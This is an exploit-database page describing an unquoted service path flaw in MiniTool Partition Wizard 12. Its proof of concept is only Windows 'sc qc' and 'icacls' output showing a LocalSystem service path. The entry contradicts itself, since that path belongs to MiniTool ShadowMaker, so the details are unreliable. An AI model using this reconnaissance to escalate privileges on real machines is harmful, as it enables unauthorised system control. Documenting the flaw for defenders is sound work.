header-logo
Suggest Exploit
vendor:
Partition Wizard
by:
Saud Alenazi
7.8
CVSS
HIGH
Unquoted Service Path
426
CWE
Product Name: Partition Wizard
Affected Version From: 12
Affected Version To: 12
Patch Exists: NO
Related CWE:
CPE: a:minitool:partition_wizard:12.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64 es
2022

MiniTool Partition Wizard – Unquoted Service Path

MiniTool Partition Wizard is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to gain elevated privileges on the system by exploiting the service path of the application. The service path is not properly quoted, allowing an attacker to inject malicious code into the service path and gain elevated privileges.

Mitigation:

Ensure that all service paths are properly quoted and that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
# Date: 07/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.0
# Tested: Windows 10 Pro x64 es

# PoC :

C:\Users\saudh>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"

C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Navigation

Suggest Exploit

Services By CQR